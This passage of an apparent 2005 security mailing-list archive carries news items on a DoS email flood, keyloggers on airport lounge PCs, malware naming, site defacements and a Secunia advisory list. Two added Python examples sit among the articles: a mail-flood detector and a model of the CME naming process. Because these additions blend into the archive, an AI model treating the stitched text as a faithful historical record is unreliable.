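    """Return one alert per sending domain whose traffic in any WINDOW crossed
    either threshold.  The alert records the state at the first crossing,
    i.e. the moment a perimeter block would be requested."""
    recent = defaultdict(list)  # domain -> [(ts, size, rcpt)] inside the window
    alerts = {}
    for ts, domain, rcpt, size in sorted(records, key=lambda r: r[0]):
        cutoff = ts - WINDOW
        bucket = [e for e in recent[domain] if e[0] >= cutoff]
        bucket.append((ts, size, rcpt))
        recent[domain] = bucket
        total = sum(e[1] for e in bucket)
        large = sum(1 for e in bucket if e[1] >= LARGE_MSG_BYTES)
        if domain not in alerts and (total > FLOOD_BYTES or large >= FLOOD_COUNT):
            alerts[domain] = {
                "domain": domain,
                "first_seen": bucket[0][0],
                "triggered_at": ts,
                "bytes": total,
                "large_count": large,
                "targets": sorted({e[2] for e in bucket}),
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_floods(parse_log(SAMPLE_LOG)):
        print(f"{alert['domain']}: {alert['large_count']} large messages, "
              f"{alert['bytes'] // (1024 * 1024)} MB in window, targets {alert['targets']}")
```

Keying on the sending domain rather than the individual address is deliberate: the sample shows several mailboxes in one domain sharing the load, and a per-address rule would see each of them as harmless. The alert also lists the recipients, since a flood concentrated on a lead partner and a press contact, as in the article, is what distinguishes a targeted nuisance from a legitimate bulk sender.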
The current Computer Misuse Act (1990) does not specifically cover DoS attacks, although the government is currently reviewing this legislation.

Even though Allen & Overy were subject to such attacks, Andrews is not in favour of tougher legislation. "There will always be somewhere in the world where an attack can be launched," he said. "There are Manchester United fans in other countries after all," Andrews said.

According to reports, Deutsche Bank was forced to pull out of talks with Glazer in late 2004 after being bombarded with faxes, phone calls and emails from Manchester United fans.

From isn at c4i.org Thu Sep 22 01:33:17 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 22 01:46:48 2005
Subject: [ISN] Airport PCs stuffed with meaty goodness
Message-ID:

http://www.theregister.co.uk/2005/09/21/airport_pc_security_lax/

By John Leyden
21st September 2005

Businesspeople are treating public access terminals in airport departure lounges as their home PCs and in the process exposing confidential data and email messages to all and sundry.

A mixture of curiosity and boredom led consultants from the Dubai-based network security outfit Scanit to uncover a plethora of secrets left by globe-trotting executives who log on in-between flights.

Many airport executive lounges are equipped with PCs that allow business and first class fliers to surf the web. Rather than using a web-based email service and clearing the cache and password completion forms before shutting down, some execs are using Outlook Express packages on these machines to write emails.

Outlook Express is probably not configured to allow emails to be sent from these machines, so any message created simply moves to the system's 'outbox' where it remains indefinitely after the user clicks 'send'. Even if the system is configured to send messages, the email will normally be saved in the machine's 'sent items' folder. In either case, email messages are left wide open for subsequent access.
You'd think most people would realise this but Scanit has discovered otherwise. While traveling to meet clients, Scanit engineers found everything from intimate messages to mistresses (perfect for blackmail) to desktop-saved documents outlining multi-million dollar deals, complete with profit margins and lowest bid values. Tasty.

They also found many of these airport lounge PCs were infected with computer viruses. Scanit chief exec David Michaux recalls a discovery he made while waiting for a delayed flight.

"As I was playing patience, I noticed heavy network traffic on the lounge machine's taskbar even though I wasn't using any network applications," he said. "After some delving I was amazed to find Back Orifice 2000 (BO2K) as the culprit. It had been invisibly collecting my keystrokes and sending a record of them to a Hotmail account every 15 minutes."

Michaux reported his findings to the lounge receptionist who said that she wasn't responsible for the security of machines.

Another lapse (this time in a London airport) permitted users to log onto machines as an administrator rather than a restricted user. Again, Scanit's engineers found key-loggers running on systems at the airport.

"The danger is that the CEO-types who travel on behalf of their companies and use these lounges are privy to usually sensitive data," Michaux explains. "This makes computers there a veritable goldmine, whether it's executives downloading attachments from their web mail and leaving them on the desktop, or even deleting them afterwards, but not emptying the recycle bin before they leave to catch their plane."

Even executives who do take care are likely to be let down by the lounge's lack of security, especially if a hacker has turned its machines into zombie drones. The security of wireless networks is often maligned but this is one problem wider use of laptops by business execs can help to control.
From isn at c4i.org Thu Sep 22 01:33:30 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 22 01:47:41 2005
Subject: [ISN] Lawmakers: Banks Should Be Responsible for Hacking Damages
Message-ID:

http://english.donga.com/srv/service.php3?bicode=020000&biid=2005092244248

SEPTEMBER 22, 2005

Starting next year, financial companies should offer compensation to customers for damages caused by electronic financial transactions, including transactions using the Internet, telephone, and automatic teller machines, even if the companies were not at fault.

So far, financial companies have rejected compensation requests, saying that they are not responsible for losses of cash caused by hacking. Also, it is expected that users of prepaid cards will have an easier time changing the balance of their cards into cash.

The Ministry of Finance and Economy and the Finance and Economy Committee of the National Assembly said on September 21 that a bill on e-finance transactions was recently submitted to a subcommittee responsible for deliberation of finance bills. The bill was automatically canceled due to delayed deliberation after it had been submitted to the 16th National Assembly in August 2003.

Park Jong-keun, Grand National Party representative and head of the finance and economy committee, said, "There is high chance that the bill would be approved by this regular session of the National Assembly, since a public hearing was held in June this year, and there is no diverging opinion between the ruling and opposition camps."

The bill stipulates that financial companies shall take responsibility for financial accidents caused by identity (ID), password and prepaid card hacking, starting next January 1, even if the companies were not at fault. Currently, financial companies and customers conform to contracts which state, "Companies shall compensate only when they made a mistake."
However, it is hard for customers to receive compensation for damages when neither companies nor customers are responsible for the accidents.

This June, when a hacker withdrew 50 million won by getting a customer's bank account number, ID, password and security card number using a hacking program, the bank refused to compensate, claiming that it was not responsible. It quickly shifted its stance and paid damages due to a public outcry over the incident, but the fact remains that there is no legal protection for victims.

If the e-finance transaction law is approved, banks will be obliged to pay damages and interest to customers if neither bank nor customer is at fault in case of financial losses such as those due to hacking. But customers will still be responsible for their own losses if they are at fault, such as leaking their passwords or carelessly keeping their security cards used in cash transactions. Banks should secure consent from customers by making a new contract according to a Presidential decree scheduled to be written early next year.

Furthermore, the bill states that banks shall pay cash when users of prepaid cards, such as gift cards that banks are currently selling, want to receive their balance in cash after spending more than 80 percent of their reserve money. Banks currently only offer the balance money option to customers when 90 percent of their reserve money is used.

Chung Yun-seon, a senior researcher at the Korea Customer Protection Board, said, "The introduction of the law will enhance the rights of customers who have had a hard time verifying the faults of financial companies."

From isn at c4i.org Fri Sep 23 01:42:09 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 23 01:50:15 2005
Subject: [ISN] US-CERT Malware Naming Plan Faces Obstacles
Message-ID:

http://www.eweek.com/article2/0,1895,1862251,00.asp

By Paul F. Roberts
September 22, 2005

US-CERT, the U.S.
Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative.

The program is intended to clear up confusion that results from the current decentralized system for naming Internet threats, which often results in the same virus or worm receiving different names from different anti-virus vendors.

However, anti-virus experts say the voluntary CME (Common Malware Enumeration) program will face a number of challenges, including that of responding quickly to virulent virus and worm outbreaks.

CME is being run by the Mitre Corp., based in Bedford, Mass. and McLean, Va., for the U.S. DHS (Department of Homeland Security) National Cyber Security Division. Work was begun on the program about one year ago.

So far, CME numbers have been assigned to a handful of critical worms and viruses, said Julie Connolly, principal information security engineer at Mitre.

New malicious code samples are held for 2 hours and, if no other example of the new code is submitted, assigned a CME number. When multiple examples of new malicious code are submitted within the 2-hour window, Mitre will ask anti-virus company researchers to work out conflicts in definitions and submit one or more samples for numbering, Connolly said.

Contrast that with the present system for naming malicious code, in which each company that discovers a threat assigns it a name based on that company's database of threats. Most companies make cursory attempts to synchronize their virus and worm names with those of other vendors, but there are frequent divergences and differences.

For example, on Sunday, Symantec Corp. issued an alert for a Category 2 mass-mailing worm it named "W32.Lanieca.H@mm."
However, Kaspersky Lab, another anti-virus company, named the same worm "Email-Worm.Win32.Tanatos.p," McAfee Inc. called the threat "W32.Eyeveg.worm" and Trend Micro Inc. called it "WORM-WURMARK.P," according to Symantec's Web site.

"Naming is a problem for everybody," said Bruce Hughes, senior anti-virus researcher at Trend Micro. The CME program will help security administrators and end users of anti-virus software, as well as anti-virus companies, Hughes said.

The new system could make it easier for operations staff at large companies to coordinate response to virus outbreaks, said Erik Johnson, vice president and program manager at Bank of America Corp. in Boston. Bank of America has different teams that handle viruses both at the network perimeter and on the company's internal network. In addition, the company uses a number of different anti-virus products simultaneously, he said. "For operations folks, it might make a difference," Johnson said.

"I don't care what they name them as long as they kill those suckers," said Hap Cluff, director of IT for the City of Norfolk, Va. Cluff said the new naming system will make it easier to respond to questions from users about new viruses and worms.

Currently, Mitre is working with major anti-virus vendors including McAfee, Symantec, Trend Micro, Sophos Plc, F-Secure Corp., Computer Associates International Inc. and Microsoft Corp. to launch the program, but the program is open to smaller anti-virus and security software vendors as well, Connolly said. Mitre has created a secure server to which participating anti-virus companies pass their discoveries, and will launch a CME Web site on Oct. 3 that will list about 21 viruses with CME numbers. Initially, only high-impact viruses and worms will receive CME numbers, though Mitre may extend CME numbers to lower-level threats once the program is up and running, she said.
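The hold-and-assign procedure Connolly describes, and the alias problem the four names for one worm illustrate, can be modelled in a few dozen lines. The Python registry below is an added example, not Mitre's CME code: a submission is held for two hours; if nothing else arrives in that window it gets the next number; if several submissions arrive and carry the same sample they are merged under one number (an assumption that goes slightly beyond the article, which only says researchers reconcile); and if the samples differ the group is parked until the vendors resolve it one way or the other. The CME-<n> id format, the submission fields, the sample-hash placeholders and the timeline are constructed; the four vendor names for the one worm are those the article lists, the other threat names are made up.

```python
"""Model of the CME hold-and-assign process described in the article.
Added example, not Mitre's code: the id format, the fields and the
timeline are assumptions, and merging identical samples automatically is
an assumption the article does not state."""
from dataclasses import dataclass
from datetime import datetime, timedelta

HOLD_WINDOW = timedelta(hours=2)


@dataclass(frozen=True)
class Submission:
    vendor: str
    vendor_name: str      # the vendor's own name for the threat
    sample_hash: str      # constructed placeholder, not a real hash
    received: datetime


class CmeRegistry:
    def __init__(self):
        self._next = 1
        self.pending = []     # submissions whose hold window is still open
        self.conflicts = []   # groups of differing samples awaiting researchers
        self.assigned = {}    # cme_id -> {"hash": ..., "names": {vendor: name}}

    def submit(self, sub):
        self.pending.append(sub)

    def _assign(self, sample_hash, subs):
        cme_id = f"CME-{self._next}"
        self._next += 1
        self.assigned[cme_id] = {"hash": sample_hash,
                                 "names": {s.vendor: s.vendor_name for s in subs}}
        return cme_id

    def process(self, now):
        """Close every hold window that has expired by `now`.  Returns the ids
        assigned in this pass; groups with differing samples go to conflicts."""
        assigned = []
        while self.pending:
            self.pending.sort(key=lambda s: s.received)
            first = self.pending[0]
            if now - first.received < HOLD_WINDOW:
                break  # still held; later submissions cannot have expired either
            # Everything that arrived during the first submission's window
            # is judged together with it.
            group = [s for s in self.pending
                     if s.received - first.received < HOLD_WINDOW]
            for s in group:
                self.pending.remove(s)
            if len({s.sample_hash for s in group}) == 1:
                assigned.append(self._assign(group[0].sample_hash, group))
            else:
                self.conflicts.append(group)
        return assigned

    def resolve(self, index, same_sample_hash=None):
        """Researchers' verdict on a conflict group: one threat (pass the
        agreed sample hash) or several (pass nothing; one id each)."""
        group = self.conflicts.pop(index)
        if same_sample_hash is not None:
            return [self._assign(same_sample_hash, group)]
        return [self._assign(s.sample_hash, [s]) for s in group]

    def lookup(self, vendor, vendor_name):
        """Map a vendor's own name to the CME id, or None if not numbered."""
        for cme_id, rec in self.assigned.items():
            if rec["names"].get(vendor) == vendor_name:
                return cme_id
        return None


def run_demo():
    """Constructed timeline exercising all three outcomes."""
    t = datetime(2005, 9, 18, 10, 0)
    reg = CmeRegistry()
    # Four vendors, four names, one sample: merged under one number.
    for minutes, vendor, name in ((0, "Symantec", "W32.Lanieca.H@mm"),
                                  (30, "Kaspersky", "Email-Worm.Win32.Tanatos.p"),
                                  (60, "McAfee", "W32.Eyeveg.worm"),
                                  (90, "Trend Micro", "WORM-WURMARK.P")):
        reg.submit(Submission(vendor, name, "sample-A", t + timedelta(minutes=minutes)))
    reg.process(t + timedelta(hours=3))
    # A lone submission: numbered once its window closes.
    reg.submit(Submission("F-Secure", "Worm.Example.B", "sample-B", t + timedelta(hours=4)))
    reg.process(t + timedelta(hours=6, minutes=30))
    # Two different samples inside one window: parked, then reconciled as one.
    reg.submit(Submission("Sophos", "Trojan.Example.C", "sample-C", t + timedelta(hours=7)))
    reg.submit(Submission("CA", "Win32/Example.D", "sample-D", t + timedelta(hours=8)))
    reg.process(t + timedelta(hours=10, minutes=30))
    conflicts_before = len(reg.conflicts)
    reg.resolve(0, same_sample_hash="sample-C")
    return reg, conflicts_before


if __name__ == "__main__":
    registry, _ = run_demo()
    for cme_id, rec in registry.assigned.items():
        print(cme_id, rec["names"])
```

The lookup table is the part that matters operationally: Weafer's point that the number may arrive hours or days after an outbreak is exactly why the registry keeps every vendor's own name alongside the id, so a console showing "W32.Eyeveg.worm" and a perimeter box showing "WORM-WURMARK.P" can be reconciled by automation once the number exists.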
The CME number and links to a description of the threat will appear on a Mitre Web site akin to the CVE (Common Vulnerabilities and Exposures) Web site. Anti-virus companies will link to that definition from their own advisories, Trend Micro's Hughes said.

Vincent Weafer, senior director of security response at Symantec, said the CME number may not be available in the first hours or even days after a big outbreak, but will provide a reference point for a malicious code threat in the weeks, months and years that follow. Even more importantly, the common ID number will make it easier to program tools to automatically respond to threats, he said.

Still, anti-virus experts said they doubted that the new system would eliminate conflicts between vendors, or replace the habit of assigning catchy names like "Code Red" and "Slammer" to viruses. "Think about Code Red, AV," Hughes said. "Anti-virus companies had a different name for that virus, but had to eventually refer to it as Code Red because the name took off--there was a sexiness to it."

From isn at c4i.org Fri Sep 23 01:42:23 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 23 01:50:27 2005
Subject: [ISN] Oracle CEO Touts Security Plans
Message-ID:

http://www.internetnews.com/bus-news/article.php/3550651

By David Needle
September 21, 2005

SAN FRANCISCO -- With all the fervor of a sold-out rock concert, thousands of Oracle faithful packed the Moscone Center here at the Oracle Open World conference to hear CEO Larry Ellison's keynote.

Earlier on Monday, Oracle co-president Charles Phillips kicked off the event with a major announcement of the database giant's plans to work with IBM on compatibility between their respective middleware offerings, Oracle's Project Fusion and IBM's WebSphere.

Ellison didn't have any blockbuster announcements to make, but he kept the attendees' attention riveted, covering a wide range of topics from Oracle's recent high-profile acquisitions to business intelligence and security.
And, of course, a few digs at rival Microsoft, a staple of almost any Ellison speech.

With Oracle's acceptance of WebSphere, Ellison did little to quell speculation the company would also support IBM's DB2 database on its Fusion middleware. It's an important issue, given that Oracle has inherited a huge number of DB2 users via acquisitions such as PeopleSoft, Retek and Siebel.

"We will make a decision after a long careful process," said Ellison. He added that Oracle is talking to PeopleSoft customers and others about whether their priorities are portability or the extra security and performance he thinks they'd get by migrating to Oracle database software. "Right now it's a coin toss [as to what Oracle will do]," said Ellison.

Addressing one controversy head-on, Ellison disputed an assertion by Marc Benioff, CEO of CRM on-demand provider Salesforce.com, that Oracle would kill its recently acquired Siebel OnDemand CRM offering because it runs on rival IBM's DB2 database. He noted that Oracle also recently acquired Retek, whose software for retailers also runs on DB2, and the company has no plans to kill that. "We're very comfortable with a multiple database strategy, if that's what customers want, and we plan to support Siebel OnDemand," Ellison said.

Security was a big theme of Ellison's remarks, which were followed by about an hour of Q&A with the audience. He said there is a debate within Oracle over whether the company should allow non-encrypted backups of Oracle database files. "If I lose a DVD with customer files, someone can read it and use that information," said Ellison. "No one wants that liability. I say no (to allowing non-encrypted backups)."

He further warned that Internet growth, along with new technologies like VoIP, are increasing security risks. "As you move more information over the public Internet and let more employee access systems from home over the Internet and from branch offices, your security risks are increasing," Ellison noted.
Among other initiatives, he said Oracle will be very focused on intrusion detection technology and strategies, as well as identity management. "Security is a number-one issue today, and it will be one, two and three tomorrow," he said.

As for VoIP, Ellison warned that companies need to be careful in their implementation of the Internet phone call technology which he said allows "malicious people" to shut down or intrude on a company's voice network.

He tweaked Microsoft's Bill Gates for once saying his company was going to devote special focus to security for the month of February. "Our first client was the CIA, and our second client was the National Security Agency. That was 25 years ago. We've been working on security since day one," said Ellison. He further claimed the last time an Oracle database was broken into was 15 years ago, versus the 45 minutes he said it took for someone to break into Microsoft's first version of its Passport online ordering system.

Another area Ellison touched on was business intelligence software, which he said is a huge improvement over the systems many businesses use today. Ellison said BI software should, for example, let a user know how much making a certain purchase puts him or her over the capital budget. Or, when a salesperson changes a sales forecast, it should let him or her see the change in ranking against peers. A favorite BI application of his in use at Oracle reveals how well its engineers are doing by comparing whether service requests are going up faster than sales. "It's much more effective if information is coming from the market rather than from a manager," said Ellison.

Asked about his next acquisition, following the multi-billion purchase of Siebel, Ellison said he has nothing planned. He reiterated a point he made over five years ago that the Internet is probably the last technology architecture, and he added that Oracle is focused on implementing service-oriented architectures (SOA).
"I'm not sure what comes after SOA," said Ellison. "This visionary is very much in the present."

From isn at c4i.org Fri Sep 23 01:41:21 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 23 01:50:41 2005
Subject: [ISN] Security demo hacked at confab
Message-ID:

http://news.com.com/2061-10789_3-5876638.html

By Daniel Terdiman
September 22, 2005

Demofall

HUNTINGTON BEACH, Calif.--Nand Mulchandani knows from network security.

His company, Redwood City, Calif.-based Determina, makes a piece of software called the "Vulnerability Protection Suite," which is designed to defend "networks from malware that exploits their most common security vulnerabilities." In other words, the package keeps the bad guys off Determina's clients' networks and makes it safe for those clients to connect their networks to the Internet.

And that's a good thing. After all, said Mulchandani, Determina's vice president of marketing and business development, "The Internet is a radioactive toxic waste dump."

But on Tuesday at the Demofall 2005 conference here, Determina may have wished it had a little bit of network protection of its own.

As the company was onstage showing off its suite--in a demonstration that would mimic an outside attack on a network--a real-life denial-of-service attack hit and effectively knocked the demo offline.

According to Mulchandani, the Determina demo was being performed across a network that had no firewall--"all the machines were hanging off the Internet"--when what appeared to be an automated attack came down the pipe and swamped the network with outside traffic.

In the end, the company was able to complete its presentation, though without having been able to showcase all the features of the product.

Determina wasn't the only company whose demonstration was affected by the attack Tuesday afternoon--a day organizers had already spent scurrying about trying to overcome problems caused by a massive thunderstorm early that morning--but none of the others were in the middle of unveiling a package designed to protect networks from outside attack.

It may sound like fiction, but you can't make this kind of stuff up.

From isn at c4i.org Fri Sep 23 01:41:35 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 23 01:50:54 2005
Subject: [ISN] RP only ASEAN nation with hacked military Web domain
Message-ID:

http://www.mb.com.ph/INFO2005092345065.html

By Melvin G. Calimag
Sept 23, 2005

To illustrate how hacking and cracking have become widespread in the Internet, a security firm said the Philippines is the only country in the Southeast Asian (SEA) region, and possibly in the whole world, whose military domain address (mil.ph) has been hacked several times in the last six years.

A study conducted by Tipping Point, a new division of Internet equipment maker 3Com that focuses on intrusion prevention, revealed the website of the Philippine Navy hosted under the mil.ph domain has been defaced several times. From 1999 to 2005, a total of nine attacks were recorded under the country's military domain name, said 3Com senior manager for security Ken Low in a recent press briefing.

As expected, commercial websites belonging to the com.ph domain name topped the list with 204 intrusions. Next came government websites connected to the gov.ph domain name with 146 attacks, followed by school websites in edu.ph with 75, then websites belonging to .ph with 71, succeeded by .org.ph with 20, and finally net.ph with 9 attacks - the same as the military. All in all, a total of 550 hacking activities were instigated against the Philippines during the period.

The top hackers who launched defacement activities against Philippine websites were Darkhunter (24), Dcoder (20), Filipino Hacker (18), Hateful Soulz (16), Red Eye (14), Cyber Attack (12), Ir2dex (11), F4kelive (11), and M@trix (10).

"These attacks would also show that there would always be hackers out there waiting to pounce on vulnerabilities. They don't stop," Low said, stressing that hackers are growing in numbers and apprehending one of them would not necessarily solve the problem.

He said instead of engaging in the useless exercise of going after the hackers, the public should be educated on the importance of protecting their websites against possible intrusion.

This was essentially the same message imparted by Commission on Information and Communications Technology (CICT) chair Virgilio Peña during his opening talk at the ManilaCon security confab last September 14.

"Laws will never catch up with technology. So what we need is a campaign to increase the awareness level of the people on security," Peña said.

For Tipping Point's Low, he said companies must also realize that traditional defenses like firewalls and detection systems are simply not enough to ward off vicious attacks.

"Instead of intrusion detection, the way to go is intrusion prevention. This way, intrusions can be stopped even before they are launched," he said.

Tipping Point also announced it has appointed TouchMedia Inc. as the local distributor for its security solutions.

From isn at c4i.org Fri Sep 23 01:41:51 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 23 01:51:07 2005
Subject: [ISN] Crisis Communications Network Criticized
Message-ID:

http://www.washingtonpost.com/wp-dyn/content/article/2005/09/22/AR2005092202160.html

By Arshad Mohammed and Yuki Noguchi
Washington Post Staff Writers
September 23, 2005

With Hurricane Rita bearing down on the Texas coast, Federal Communications Commission Chairman Kevin J. Martin said yesterday that the nation's emergency first responders need a mobile, wireless system that allows them to talk to one another in times of crisis anywhere in the country.

The lack of such a system slowed recovery efforts after Hurricane Katrina. Police, fire and rescue personnel struggled to work together after electric power failed and the telecommunications network in Mississippi, Louisiana and Alabama was extensively damaged.

Yesterday Martin called for developing more rugged first responder networks and making greater use of satellite technology that does not depend on vulnerable ground infrastructure.

"When radio towers are knocked down, satellite communications may be the most effective means of communicating," Martin said at a hearing of the Senate Commerce Committee. "If we learned anything from Hurricane Katrina, it is that we cannot rely solely on terrestrial communications."

Telecommunications companies yesterday positioned mobile equipment to be ready for the new storm. Bethesda-based satellite company Iridium Satellite LLC worked to get 8,000 to 10,000 of its phones delivered after Katrina hit, but this time, the company called FedEx Corp. in advance to distribute phones to areas near Rita's projected path, said Greg Ewert, an executive vice president.

Ewert said that it was difficult to get as many phones to Texas because some are still being used in the New Orleans area and that he hopes many will travel with the emergency workforce into Texas.

"It's definitely putting pressure on us," he said. "If it's just as bad as Katrina and it hits Houston, then we'll be strained to get the same amount of phones out there."

Calls by military and emergency workers caused satellite phone traffic to spike to 3,000 percent of usual levels after Katrina, Ewert said. To get more airwave frequency to accommodate that volume, Iridium had to get approval from the FCC and other similar agencies around the world.

Cingular Wireless LLC also rushed to prepare yesterday, stationing 30,000 gallons of gas, 16 temporary cell towers, more than 200 generators and about 120 technicians on standby to wait for Rita. In less than a month, Cingular has had to move such equipment from New Orleans and the Gulf Coast area where Hurricane Katrina hit, to North Carolina where Hurricane Ophelia was projected to hit, and now to Texas.

The fact that such piecemeal solutions are still required four years after the Sept. 11, 2001, terrorist attacks made emergency communications a national priority has drawn criticism.

"How many times do things like this need to happen before we . . . recognize that we need to make hard decisions, to give public safety the resources they need to do the job?" said Robert LeGrande, deputy chief technology officer for the District.

Hurricane Katrina has revived calls in Congress to set a date for police, fire departments and emergency medical services to receive radio frequencies set aside for them nearly a decade ago but still used by television broadcasters. The 9/11 Commission Report, which documented in painful detail the inability of police and firefighters to communicate with one another as they tried to save people in the World Trade Center, cited freeing those frequencies as one of its key recommendations.

Martin said yesterday that first responders need "smart radios" that can hop between available networks and also urged the creation of a more sophisticated national alert system to warn people of disasters, using the Internet and other newer technologies.

Public safety experts said it could take years to create a truly seamless communications network for police, fire and rescue workers. Many factors are to blame, they said, including the difficulty of getting various public-safety groups to work together at the local level and the huge cost of replacing existing equipment.

Most police, fire and emergency medical departments buy their own systems independently and often dislike giving up control of them. Gerald R. Faulhaber, a professor at the University of Pennsylvania and former FCC chief economist, described "the politics of control" at the local level as one of the greatest obstacles.

"The police chiefs fight tooth and nail to maintain control over their radios and their channels. The fire chiefs fight tooth and nail to maintain control over their radios," he said. "Who is going to take on the police chief? Who is going to take on the fire chief?"

David Aylward, the director of ComCARE, a nonprofit group that seeks to improve first-responder communications, said that while long-term issues are discussed, more could be done to make better use of existing networks.

"What isn't years away is connecting agencies together and backing it up with redundant satellite and satellite links. That could be done in six months, and it's a travesty that it wasn't done and that it isn't done," he said.

© 2005 The Washington Post Company

From isn at c4i.org Fri Sep 23 01:43:15 2005
From: isn at c4i.org (InfoSec News)
Date: Fri Sep 23 01:51:23 2005
Subject: [ISN] Secunia Weekly Summary - Issue: 2005-38
Message-ID:

========================================================================

The Secunia Weekly Advisory Summary
2005-09-15 - 2005-09-22

This week : 58 advisories

========================================================================
Table of Contents:

1.....................................................Word From Secunia
2....................................................This Week In Brief
3...............................This Week's Top Ten Most Read Advisories
4.......................................Vulnerabilities Summary Listing
5.......................................Vulnerabilities Content Listing

========================================================================
1) Word From Secunia:

The Secunia staff is spending hours every day to assure you the best and most reliable source for vulnerability information.

Every single vulnerability report is being validated and verified before a Secunia advisory is written.

Secunia validates and verifies vulnerability reports in many different ways e.g. by downloading the software and performing comprehensive tests, by reviewing source code, or by validating the credibility of the source from which the vulnerability report was issued.

As a result, Secunia's database is the most correct and complete source for recent vulnerability information available on the Internet.

Secunia Online Vulnerability Database:
http://secunia.com/

========================================================================
2) This Week in Brief:

Peter Zelezny has discovered a vulnerability in various Mozilla based products, which can be exploited by malicious people to compromise a user's system.

This vulnerability can only be exploited on Unix / Linux based environments.
Additional details about solutions and possible attack vectors can be found in the referenced Secunia advisories below.

References:
http://secunia.com/SA16869
http://secunia.com/SA16846

--

Secunia Research has discovered two vulnerabilities in the Opera Mail client, which can be exploited by a malicious person to conduct script insertion attacks and to spoof the name of attached files.

The vendor has released an updated version, which fixes these vulnerabilities.

Reference:
http://secunia.com/SA16645

--

Two vulnerabilities have been reported in ClamAV, which can be exploited by malicious people to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.

Additional details can be found in the referenced Secunia advisory below.

Reference:
http://secunia.com/SA16848

VIRUS ALERTS:

Secunia has not issued any virus alerts during the week.

========================================================================
3) This Week's Top Ten Most Read Advisories:

1. [SA16869] Firefox Command Line URL Shell Command Injection
2. [SA16764] Firefox IDN URL Domain Name Buffer Overflow
3. [SA16806] Linksys WRT54G Multiple Vulnerabilities
4. [SA16645] Opera Mail Client Attachment Spoofing and Script Insertion
5. [SA11762] Opera Browser Favicon Displaying Address Bar Spoofing Vulnerability
6. [SA15601] Mozilla / Mozilla Firefox Frame Injection Vulnerability
7. [SA16480] Microsoft DDS Library Shape Control Code Execution Vulnerability
8. [SA16830] IBM Lotus Domino "BaseTarget" and "Src" Cross-Site Scripting
9. [SA12758] Microsoft Word Document Parsing Buffer Overflow Vulnerabilities
10. [SA16560] Windows Registry Editor Utility String Concealment Weakness

========================================================================
4) Vulnerabilities Summary Listing

Windows:
[SA16877] BNBT / CBTT / XBNBT Denial of Service Vulnerability
[SA16871] VERITAS Storage Exec / StorageCentral DCOM Server Buffer Overflow
[SA16854] TAC Vista "Template" Disclosure of Sensitive Information Vulnerability
[SA16838] Compuware DriverStudio Two Vulnerabilities
[SA16870] Digger Solutions Intranet Open Source "project_id" SQL Injection
[SA16865] Multi-Computer Control System (MCCS) Denial of Service Vulnerability

UNIX/Linux:
[SA16869] Firefox Command Line URL Shell Command Injection
[SA16846] Mozilla Command Line URL Shell Command Injection
[SA16895] Alkalay contribute "template" Shell Command Injection Vulnerability
[SA16894] HP OpenVMS Secure Web Browser Multiple Vulnerabilities
[SA16887] Alkalay man-cgi "topic" Shell Command Injection Vulnerability
[SA16886] Alkalay notify "from" Shell Command Injection Vulnerability
[SA16884] Mandriva update for clamav
[SA16880] Alkalay nslookup Shell Command Injection Vulnerabilities
[SA16879] HP Tru64 UNIX libXpm Multiple Vulnerabilities
[SA16862] Gentoo update for clamav
[SA16848] ClamAV UPX and FSG Handling Vulnerabilities
[SA16844] Gentoo update for mozilla/mozilla-firefox
[SA16834] SUSE update for evolution
[SA16892] Gentoo update for zebedee
[SA16872] Unixware update for Libtiff
[SA16864] Gentoo update for apache/mod_ssl
[SA16858] Webmin / Usermin PAM Authentication Bypass Vulnerability
[SA16856] Gentoo update for mailutils
[SA16849] SUSE update for squid
[SA16876] Tofu Game Engine Arbitrary Python Code Execution Vulnerability
[SA16863] Gentoo workaround for py2play
[SA16855] Py2Play Game Engine Arbitrary Python Code Execution Vulnerability
[SA16888] PerlDiver "module" Cross-Site Scripting Vulnerability
[SA16893] HP Tru64 UNIX FTP Daemon Denial of Service Vulnerability
[SA16885] Mandriva update for cups
[SA16883] MasqMail Two Privilege Escalation Vulnerabilities
[SA16874] Sun Solaris "tl" Driver Denial of Service Vulnerability
[SA16866] Bacula Multiple Insecure Temporary File Creation Vulnerability
[SA16861] Trustix update for multiple packages
[SA16860] Fedora update for xorg-x11
[SA16850] Debian update for kdebase
[SA16845] Sun Solaris X11 Pixmap Creation Integer Overflow Vulnerability
[SA16842] Debian update for lm-sensors
[SA16835] SimpleCDR-X Insecure Temporary Image File Creation
[SA16875] Safari "data:" URI Handler Denial of Service Weakness
[SA16891] Gentoo update for util-linux
[SA16882] Mandriva update for util-linux
[SA16857] Ubuntu update for util-linux

Other:
[SA16840] vxTftpSrv Long Filename Buffer Overflow
[SA16837] vxFtpSrv "USER" Command Buffer Overflow Vulnerability
[SA16836] Avocent CCM Port Access Control Bypass Vulnerability
[SA16839] vxWeb Denial of Service Vulnerability

Cross Platform:
[SA16841] Digital Scribe "username" SQL Injection
[SA16896] Zengaia Unspecified SQL Injection Vulnerability
[SA16881] Simplog SQL Injection Vulnerabilities
[SA16878] Land Down Under "Referer" SQL Injection Vulnerability
[SA16867] PHP Advanced Transfer Manager Multiple Vulnerabilities
[SA16859] Helpdesk software Hesk Authentication Bypass Vulnerability
[SA16853] NooToplist "o" SQL Injection Vulnerability
[SA16843] PHP-Nuke Unspecified wysiwyg Editor Vulnerabilities
[SA16873] vBulletin Multiple Vulnerabilities
[SA16868] phpBB Remote Avatar Information Disclosure Weakness

========================================================================
5) Vulnerabilities Content Listing

Windows:
--
[SA16877] BNBT / CBTT / XBNBT Denial of Service Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2005-09-20
A vulnerability has been reported in BNBT / CBTT / XBNBT, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/16877/

--
[SA16871] VERITAS Storage Exec / StorageCentral DCOM Server Buffer Overflow
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2005-09-20
A vulnerability has been reported in Storage Exec / StorageCentral, which can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/16871/

--
[SA16854] TAC Vista "Template" Disclosure of Sensitive Information Vulnerability
